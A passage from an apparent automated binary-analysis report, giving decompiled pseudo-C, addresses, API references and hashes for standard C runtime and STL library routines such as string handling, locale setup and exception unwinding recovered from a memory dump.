							_t274 =  &_v68;
						}
						_t408 = E0086A9B0( &_v12, _t274,  &_v12);
						_t276 =  *_t304;
						_t419 = _t419 + 8;
						if(_t276 != 0x7f) {
							while(_t276 > 0) {
								_t388 = _t408 - _v16;
								_t278 = _t276;
								if(_t278 < _t408 - _v16) {
									_t408 = _t408 - _t278;
									E00865C90(_t388, _t408,  &_v68, 1, 0);
									if( *((char*)(_t304 + 1)) > 0) {
										_t304 = _t304 + 1;
									}
									_t276 =  *_t304;
									if(_t276 != 0x7f) {
										continue;
									}
								}
								goto L36;
							}
						}
						L36:
						if(_v48 < 0x10) {
							_a16 =  &_v68;
						} else {
							_a16 = _v68;
						}
						_t386 = _v52;
						_t410 = _a16;
						_a28 = 0;
						_a32 = _t386;
						_t394 = _t386;
					}
				}
				_t357 = _a8;
				_t315 =  *((intOrPtr*)(_t357 + 0x20));
				_t214 = _a20 + _a24 + _a28 + _t394;
				_t450 =  *((intOrPtr*)(_t357 + 0x24));
				if(_t450 < 0 || _t450 <= 0 && _t315 == 0 || _t315 <= _t214) {
					_a16 = 0;
					_t291 = _a16;
				} else {
					_t291 = _t315 - _t214;
					_a16 = _t315 - _t214;
				}
				_t359 =  *(_t357 + 0x14) & 0x000001c0;
				if(_t359 != 0x40) {
					if(_t359 == 0x100) {
						__eflags = _v16;
						if(_v16 > 0) {
							_t264 = E00865D70(1, _t410,  &_v32, _a36, _a40);
							_t419 = _t419 + 0xc;
							_a36 =  *_t264;
							_t410 = _t410 + 1;
							_t402 = _t394 - 1;
							__eflags = _t402;
							_a40 =  *((intOrPtr*)(_t264 + 4));
							_a32 = _t402;
						}
						_t260 = E00864700(_t291, _a12,  &_v32, _a36, _a40);
						_a36 =  *_t260;
						_a40 =  *((intOrPtr*)(_t260 + 4));
					} else {
						_t267 = E00864700(_t291, _a12,  &_v32, _a36, _a40);
						_a36 =  *_t267;
						_a40 =  *((intOrPtr*)(_t267 + 4));
					}
					_t394 = _a32;
					_a16 = 0;
					_t419 = _t419 + 8;
				}
				_t215 = E0086A7E0(_t410, _v12, _t394);
				_t420 = _t419 + 0xc;
				if(_t215 != 0) {
					_v28 = _t215 - _t410 + 1;
					_t246 = E00865DE0(_t410, _v5,  &_v20, _t215 - _t410 + 1 - 1, _a36, _a40);
					_a36 =  *_t246;
					_a40 =  *((intOrPtr*)(_t246 + 4));
					_t248 = E00864700(_a20, 0x30,  &_v20,  *_t246,  *((intOrPtr*)(_t246 + 4)));
					_a36 =  *_t248;
					_a40 =  *((intOrPtr*)(_t248 + 4));
					_t253 = E00864700(1,  *((intOrPtr*)( *((intOrPtr*)( *_v36 + 4))))(),  &_v40, _a36, _a40);
					_a36 =  *_t253;
					_a40 =  *((intOrPtr*)(_t253 + 4));
					_t256 = E00864700(_a24, 0x30,  &_v40,  *_t253,  *((intOrPtr*)(_t253 + 4)));
					_a36 =  *_t256;
					_t257 = _v28;
					_t420 = _t420 + 0x28;
					_t410 = _t410 + _t257;
					_a32 = _a32 - _t257;
					_t394 = _a32;
					_a40 =  *((intOrPtr*)(_t256 + 4));
				}
				_t216 = E0086A7E0(_t410, 0x65, _t394);
				_t421 = _t420 + 0xc;
				if(_t216 != 0) {
					_a20 = _t216 - _t410 + 1;
					_t235 = E00865DE0(_t410, _v5,  &_v40, _t216 - _t410 + 1 - 1, _a36, _a40);
					_a36 =  *_t235;
					_a40 =  *((intOrPtr*)(_t235 + 4));
					_t237 = E00864700(_a28, 0x30,  &_v40,  *_t235,  *((intOrPtr*)(_t235 + 4)));
					_a36 =  *_t237;
					_t424 = _t421 + 0x18;
					_a40 =  *((intOrPtr*)(_t237 + 4));
					_a28 = 0;
					_t327 = "E";
					if(( *(_a8 + 0x14) & 0x00000004) == 0) {
						_t327 = "e";
					}
					_t240 = E00865D70(1, _t327,  &_v40,  *_t237,  *((intOrPtr*)(_t237 + 4)));
					_a36 =  *_t240;
					_t241 = _a20;
					_t421 = _t424 + 0xc;
					_t410 = _t410 + _t241;
					_a32 = _a32 - _t241;
					_t394 = _a32;
					_a40 =  *((intOrPtr*)(_t240 + 4));
				}
				_t219 = E00865DE0(_t410, _v5,  &_v40, _t394, _a36, _a40);
				_a36 =  *_t219;
				_a40 =  *((intOrPtr*)(_t219 + 4));
				_t221 = E00864700(_a28, 0x30,  &_v40,  *_t219,  *((intOrPtr*)(_t219 + 4)));
				_t363 = _a8;
				_t396 = _a4;
				_a36 =  *_t221;
				_a40 =  *((intOrPtr*)(_t221 + 4));
				 *((intOrPtr*)(_t363 + 0x20)) = 0;
				 *((intOrPtr*)(_t363 + 0x24)) = 0;
				E00864700(_a16, _a12, _t396,  *_t221,  *((intOrPtr*)(_t221 + 4)));
				_t422 = _t421 + 0x20;
				if(_v48 >= 0x10) {
					_push(_v68);
					E0086A99B();
					_t422 = _t422 + 4;
				}
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				if(_v76 >= 0x10) {
					_push(_v96);
					E0086A99B();
				}
				return _t396;
			}

0x00863f3e
0x00863f46
0x00863f49
0x00863f4e
0x00863f54
0x00863f57
0x00863f57
0x00863f5d
0x00863f66
0x00863f6b
0x00863f6e
0x00863f75
0x00863f78
0x00863f7d
0x00863f82
0x00863f8a
0x00863f8a
0x00863f92
0x00863f99
0x00863f9e
0x00863fa0
0x00863faa
0x00863faa
0x00863fb7
0x00863fc0
0x00863fc2
0x00863fc5
0x00863fc8
0x00863fca
0x00863fd1
0x00863fd8
0x00863fde
0x00863feb
0x00863feb
0x00863fe0
0x00863fe0
0x00863fe7
0x00863fe9
0x00000000
0x00000000
0x00863fe9
0x00863ff2
0x00863ff9
0x00864002
0x00864005
0x0086401a
0x0086401d
0x00864022
0x00864024
0x00864029
0x0086402b
0x0086402b
0x0086402e
0x00864031
0x00864034
0x00864039
0x0086403b
0x0086403b
0x00864041
0x00864047
0x0086404c
0x0086404e
0x0086404e
0x00864054
0x00864060
0x00864065
0x0086406a
0x0086407c
0x0086407e
0x00864089
0x0086408e
0x0086408e
0x00864091
0x00864096
0x0086409c
0x008640a1
0x0086406c
0x00864075
0x00864075
0x008640a4
0x008640a8
0x008640bb
0x008640bb
0x008640bd
0x008640be
0x008640c4
0x008640d1
0x008640d6
0x008640aa
0x008640ad
0x008640b1
0x008640b1
0x008640e1
0x008640e4
0x008640eb
0x008640ed
0x008640ed
0x008640f4
0x008640f7
0x008640f9
0x008640f9
0x00864106
0x00864108
0x0086410a
0x0086410f
0x00864111
0x00864117
0x0086411a
0x0086411f
0x00864123
0x0086412a
0x00864133
0x00864135
0x00864135
0x00864136
0x0086413a
0x00000000
0x00000000
0x0086413a
0x00000000
0x0086411f
0x00864111
0x0086413c
0x00864140
0x0086414d
0x00864142
0x00864145
0x00864145
0x00864150
0x00864153
0x00864156
0x0086415d
0x00864160
0x00864160
0x00864054
0x00864168
0x0086416e
0x00864171
0x00864173
0x00864177
0x0086418c
0x00864193
0x00864183
0x00864185
0x00864187
0x00864187
0x00864199
0x008641a2
0x008641ae
0x008641d2
0x008641d6
0x008641eb
0x008641f2
0x008641f5
0x008641fb
0x008641fc
0x008641fc
0x008641fd
0x00864200
0x00864200
0x00864213
0x0086421a
0x00864220
0x008641b0
0x008641c0
0x008641c7
0x008641cd
0x008641cd
0x00864223
0x00864226
0x0086422d
0x0086422d
0x00864237
0x0086423c
0x00864241
0x00864254
0x00864260
0x00864267
0x0086426d
0x0086427f
0x00864286
0x0086428f
0x008642ae
0x008642b5
0x008642bb
0x008642cd
0x008642d4
0x008642da
0x008642dd
0x008642e0
0x008642e2
0x008642e5
0x008642e8
0x008642e8
0x008642ef
0x008642f4
0x008642f9
0x0086430c
0x00864318
0x0086431f
0x00864325
0x00864337
0x0086433e
0x00864347
0x0086434e
0x00864351
0x00864358
0x0086435d
0x0086435f
0x0086435f
0x00864374
0x0086437b
0x00864381
0x00864384
0x00864387
0x00864389
0x0086438c
0x0086438f
0x0086438f
0x008643a4
0x008643ab
0x008643b1
0x008643c3
0x008643ca
0x008643d0
0x008643d3
0x008643da
0x008643e3
0x008643e6
0x008643e9
0x008643f3
0x008643f9
0x008643fe
0x008643ff
0x00864404
0x00864404
0x00864409
0x00864410
0x00864413
0x00864419
0x0086441e
0x0086441f
0x00864424
0x0086442f

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00863F49
std::_Lockit::_Lockit.LIBCPMT ref: 00863F78
_localeconv.LIBCMT ref: 00863FF2

Part of subcall function 00865A00: std::_Xinvalid_argument.LIBCPMT ref: 00865A1B
Part of subcall function 00865A00: std::_Xinvalid_argument.LIBCPMT ref: 00865A36

_strcspn.LIBCMT ref: 00864101

Strings

e, xrefs: 00864005

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$LockitLockit::_Xinvalid_argument$_localeconv_strcspn
String ID: e
API String ID: 2024344720-4024072794
Opcode ID: 1d8848d2b7266467447aa3402c63af90d2d8a34b9cd9bd892f67844ea175d6b5
Instruction ID: f95d7bedb2f544d5a157f1e290bbffa22bcb90d97ef6b4d0aa5cf45d06265ef2
Opcode Fuzzy Hash: 1d8848d2b7266467447aa3402c63af90d2d8a34b9cd9bd892f67844ea175d6b5
Instruction Fuzzy Hash: 6B025775A002089FCB04DFA8C881AEEBBB5FF9D304F168259E919AB351D730ED45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0086DF4D, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0086DF4D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x8834f8);
				E00871820(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E0086BD9C(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00870C52(__ecx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00870C52(_t48, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00870C52(_t48, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00870C52(_t48, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E0086BE41(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0086E073(_t48, _t53, _t55, _t57, _t61);
				return E00871865( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0086df4d
0x0086df4d
0x0086df4f
0x0086df54
0x0086df59
0x0086df5b
0x0086df5e
0x0086df61
0x0086df64
0x0086df6b
0x0086df7c
0x0086df8a
0x0086df98
0x0086dfa0
0x0086dfae
0x0086dfb4
0x0086dfbb
0x0086dfbe
0x0086dfd4
0x0086dfd7
0x0086e04c
0x0086e053
0x0086e05a
0x0086e067

APIs

__CreateFrameInfo.LIBCMT ref: 0086DF75

Part of subcall function 0086BD9C: __getptd.LIBCMT ref: 0086BDAA
Part of subcall function 0086BD9C: __getptd.LIBCMT ref: 0086BDB8

__getptd.LIBCMT ref: 0086DF7F

Part of subcall function 00870C52: __getptd_noexit.LIBCMT ref: 00870C55
Part of subcall function 00870C52: __amsg_exit.LIBCMT ref: 00870C62

__getptd.LIBCMT ref: 0086DF8D
__getptd.LIBCMT ref: 0086DF9B
__getptd.LIBCMT ref: 0086DFA6
_CallCatchBlock2.LIBCMT ref: 0086DFCC

Part of subcall function 0086BE41: __CallSettingFrame@12.LIBCMT ref: 0086BE8D

Part of subcall function 0086E073: __getptd.LIBCMT ref: 0086E082
Part of subcall function 0086E073: __getptd.LIBCMT ref: 0086E090

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: f6b437bdd3528a22efe6b19cdd15a63cba4762ca56422a93c839b865e521631b
Instruction ID: 8a57019b79df6a7ce5307d4a398b2f0d384cf53eacba1159194d698f57738750
Opcode Fuzzy Hash: f6b437bdd3528a22efe6b19cdd15a63cba4762ca56422a93c839b865e521631b
Instruction Fuzzy Hash: 5511F675C00209DFDF01EFA8C486AAD7BB0FF08314F108169F868EB252DB789A509F52

Uniqueness

Uniqueness Score: -1.00%

Function 0087275F, Relevance: 9.0, APIs: 6, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0087275F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x883708);
				E00871820(__ebx, __edi, __esi);
				_t31 = E00870C52(__ebx, __edi, _t35);
				_t15 =  *0x885964; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00871192(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x886188; // 0x5f2ba8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x885d60;
								if(__eflags != 0) {
									E0086A7A3(_t33);
								}
							}
						}
						_t21 =  *0x886188; // 0x5f2ba8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x886188; // 0x5f2ba8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E008727FA();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E0086AD14(_t29, _t31, _t33, _t38);
				}
				return E00871865(_t33);
			}

0x0087275f
0x0087275f
0x0087275f
0x0087275f
0x00872761
0x00872766
0x00872770
0x00872772
0x0087277a
0x0087279b
0x008727a1
0x008727a5
0x008727a8
0x008727ab
0x008727b1
0x008727b3
0x008727b5
0x008727be
0x008727c0
0x008727c2
0x008727c8
0x008727cb
0x008727d0
0x008727c8
0x008727c0
0x008727d1
0x008727d6
0x008727d9
0x008727df
0x008727e3
0x008727e3
0x008727e9
0x008727f0
0x00872782
0x00872782
0x00872782
0x00872785
0x00872787
0x00872789
0x0087278b
0x00872790
0x00872798

APIs

__getptd.LIBCMT ref: 0087276B

Part of subcall function 00870C52: __getptd_noexit.LIBCMT ref: 00870C55
Part of subcall function 00870C52: __amsg_exit.LIBCMT ref: 00870C62

__amsg_exit.LIBCMT ref: 0087278B
__lock.LIBCMT ref: 0087279B
InterlockedDecrement.KERNEL32(?), ref: 008727B8
_free.LIBCMT ref: 008727CB
InterlockedIncrement.KERNEL32(005F2BA8), ref: 008727E3

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 30a1510174e2d9b4581cf8da675f3a25a0f01c6647661f56e065ae4b9300b175
Instruction ID: dec59fd04dc3640fb1fbca57be220aff05951d4b05a382a0358e9c98c7f74fa7
Opcode Fuzzy Hash: 30a1510174e2d9b4581cf8da675f3a25a0f01c6647661f56e065ae4b9300b175
Instruction Fuzzy Hash: 91012275900B21EBDB28AB6D998971C77A0FF007A0F148114E81CE768ADB34ED80CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00865AE0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00865AE0(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t18;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr* _t50;

				_t34 = _a8;
				_t50 = __ecx;
				_t36 = _a4;
				_t42 =  *((intOrPtr*)(_t36 + 0x10));
				if(_t42 < _t34) {
					E008695E5("invalid string position");
				}
				_t15 = _a12;
				_t43 = _t42 - _t34;
				if(_t15 < _t43) {
					_t43 = _t15;
				}
				if(_t50 != _t36) {
					if(_t43 > 0xfffffffe) {
						E00869598("string too long");
					}
					_t16 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t16 >= _t43) {
						if(_t43 != 0) {
							goto L10;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
							if(_t16 < 0x10) {
								_t24 = _t50;
								 *_t24 = 0;
								return _t24;
							} else {
								 *((char*)( *_t50)) = 0;
								return _t50;
							}
						}
					} else {
						E00866E50(_t50, _t43,  *((intOrPtr*)(_t50 + 0x10)));
						_t36 = _a4;
						if(_t43 == 0) {
							L22:
							return _t50;
						} else {
							L10:
							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
								_t36 =  *_t36;
							}
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								_t18 = _t50;
							} else {
								_t18 =  *_t50;
							}
							E0086B710(_t18, _t36 + _t34, _t43);
							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t43)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t50 + _t43)) = 0;
								return _t50;
							}
						}
					}
				} else {
					E00866D80(_t50, _t43 + _t34, 0xffffffff);
					E00866D80(_t50, 0, _t34);
					return _t50;
				}
			}

0x00865ae4
0x00865ae8
0x00865aea
0x00865aee
0x00865af3
0x00865afa
0x00865afa
0x00865aff
0x00865b02
0x00865b06
0x00865b08
0x00865b08
0x00865b0c
0x00865b30
0x00865b37
0x00865b37
0x00865b3c
0x00865b41
0x00865b6d
0x00000000
0x00865b6f
0x00865b6f
0x00865b75
0x00865b86
0x00865b89
0x00865b8e
0x00865b77
0x00865b7a
0x00865b82
0x00865b82
0x00865b75
0x00865b43
0x00865b4a
0x00865b4f
0x00865b54
0x00865bbe
0x00865bc4
0x00865b56
0x00865b56
0x00865b5e
0x00865b60
0x00865b60
0x00865b65
0x00865b91
0x00865b67
0x00865b67
0x00865b67
0x00865b98
0x00865ba4
0x00865ba7
0x00865bba
0x00000000
0x00865ba9
0x00865bab
0x00865bb5
0x00865bb5
0x00865ba7
0x00865b54
0x00865b0e
0x00865b15
0x00865b1f
0x00865b2a
0x00865b2a

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00865AFA

Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 008695FA
Part of subcall function 008695E5: __CxxThrowException@8.LIBCMT ref: 0086960F
Part of subcall function 008695E5: std::exception::exception.LIBCMT ref: 00869620

std::_Xinvalid_argument.LIBCPMT ref: 00865B37

Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695AD
Part of subcall function 00869598: __CxxThrowException@8.LIBCMT ref: 008695C2
Part of subcall function 00869598: std::exception::exception.LIBCMT ref: 008695D3

_memmove.LIBCMT ref: 00865B98

Strings

string too long, xrefs: 00865B32
invalid string position, xrefs: 00865AF5

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 45806db341f662b78ef0cb082d4def29ebb95f4f776dfee55acdcd5e22084e92
Instruction ID: 2fbf0cc675deca1e88210c0eb6c45d97fd61ce9a47b716f8a0e875f979849017
Opcode Fuzzy Hash: 45806db341f662b78ef0cb082d4def29ebb95f4f776dfee55acdcd5e22084e92
Instruction Fuzzy Hash: ED31A7323006149BD7219E5CE880E6EF399FBA1775F26052FF155CB291DB62DC4183A5

Uniqueness

Uniqueness Score: -1.00%

Function 0086E2FA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0086E2FA(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0086E268(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0086BAF6(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0086DCD9(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E0086DF4D(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E0086BABD(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0086e2fa
0x0086e2fa
0x0086e2fa
0x0086e2fa
0x0086e2ff
0x0086e303
0x0086e305
0x0086e308
0x0086e309
0x0086e30a
0x0086e30d
0x0086e312
0x0086e312
0x0086e315
0x0086e319
0x0086e31c
0x0086e321
0x0086e31e
0x0086e31e
0x0086e31e
0x0086e324
0x0086e329
0x0086e32b
0x0086e32e
0x0086e331
0x0086e332
0x0086e33a
0x0086e33f
0x0086e343
0x0086e346
0x0086e349
0x0086e34c
0x0086e34f
0x0086e350
0x0086e353
0x0086e35d
0x0086e361
0x00000000
0x0086e361
0x0086e367

APIs

___BuildCatchObject.LIBCMT ref: 0086E30D

Part of subcall function 0086E268: ___BuildCatchObjectHelper.LIBCMT ref: 0086E29E

_UnwindNestedFrames.LIBCMT ref: 0086E324
___FrameUnwindToState.LIBCMT ref: 0086E332

Strings

csm, xrefs: 0086E309, 0086E31E, 0086E331, 0086E34F, 0086E35F
csm, xrefs: 0086E2FC

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: a11849db733a0fc096dfdfa77e9f94f6fe2c52a03ae931a0dd8c1fe4680f0a1f
Instruction ID: 269c6097201df45e43325db9724f0390dae4f1acda77a9806cc9d5793d667786
Opcode Fuzzy Hash: a11849db733a0fc096dfdfa77e9f94f6fe2c52a03ae931a0dd8c1fe4680f0a1f
Instruction Fuzzy Hash: 25014635401109BBDF22AF95CD46EEA7F6AFF08384F024010FD1895221DB3299B1EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00861050, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00861050(void* __ecx, char* _a4) {
				char _v16;
				void* __ebx;
				void* __esi;
				char* _t16;
				void* _t25;
				void* _t26;

				_t26 = __ecx;
				E008696AD(__ecx, 0);
				_t16 = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((char*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((char*)(__ecx + 0x20)) = 0;
				_t29 = _t16;
				if(_t16 == 0) {
					_a4 = "bad locale name";
					E0086A180( &_v16,  &_a4);
					_v16 = 0x87f2fc;
					_t16 = E0086BA71( &_v16, 0x883888);
				}
				E008693F7(0, _t25, _t26, _t29, _t26, _t16);
				return _t26;
			}

0x0086105b
0x0086105d
0x00861062
0x00861065
0x00861068
0x0086106b
0x0086106e
0x00861071
0x00861074
0x00861077
0x0086107a
0x0086107d
0x0086107f
0x00861088
0x0086108f
0x0086109d
0x008610a4
0x008610a4
0x008610ab
0x008610ba

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0086105D
std::exception::exception.LIBCMT ref: 0086108F

Part of subcall function 0086A180: std::exception::_Copy_str.LIBCMT ref: 0086A19B

__CxxThrowException@8.LIBCMT ref: 008610A4

Part of subcall function 0086BA71: RaiseException.KERNEL32(?,?,0086ADB1,?,?,?,?,?,0086ADB1,?,00883954,00888B28), ref: 0086BAB3

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 008610AB

Strings

bad locale name, xrefs: 00861088

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 73090415-1405518554
Opcode ID: ecc7ecdd9da918bd1f91b411ead193602cedfe7129eaa21391add5a73c453ed5
Instruction ID: 0932b1ef47aa3473609133fa8d197a7f55355d9aa19b0c8c1d09b1c4fc1e9cb0
Opcode Fuzzy Hash: ecc7ecdd9da918bd1f91b411ead193602cedfe7129eaa21391add5a73c453ed5
Instruction Fuzzy Hash: 09018B75905748AA8720EF99849149BFBE8FE15300740856EF599D3701D731A64C8BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00863100, Relevance: 7.7, APIs: 5, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00863100(intOrPtr* _a4, char _a8, intOrPtr _a12, char _a16, signed int _a24, signed int* _a28, char* _a32) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
